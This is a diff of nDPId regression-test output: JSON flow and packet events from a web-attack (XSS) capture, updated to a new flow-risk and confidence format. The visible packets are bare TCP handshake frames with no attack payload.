 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347466553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KvdAAD4GmtmsEAABwKgKMuCWAFD9ZuXtAAAAAKACchDKcwAAAgQFtAQCCAoBOs8aAAAAAAEDAwc="}
@@ -1638,16 +1638,16 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347475384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yGtAAD4G\/WSsEAABwKgKMuD2AFCdWh\/RAAAAAKACchDnnAAAAgQFtAQCCAoBOte6AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347475384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4PYsYAVjnVof0qAScSAJpQAAAgQFtAQCCAoD5KkvATrXugEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":1499347475385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347475385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yGxAAD4G\/WusEAABwKgKMuD2AFCdWh\/SLGAFZIAQAOWorAAAAQEICgE617oD5Kkv"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476406,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347476667,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347476667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86aJAAD4G3C2sEAABwKgKMuEEAFDYCDFYAAAAAKACchCaGQAAAgQFtAQCCAoBOtj6AAAAAAEDAwc="}
@@ -1673,21 +1673,21 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347486787,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347486787,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"}
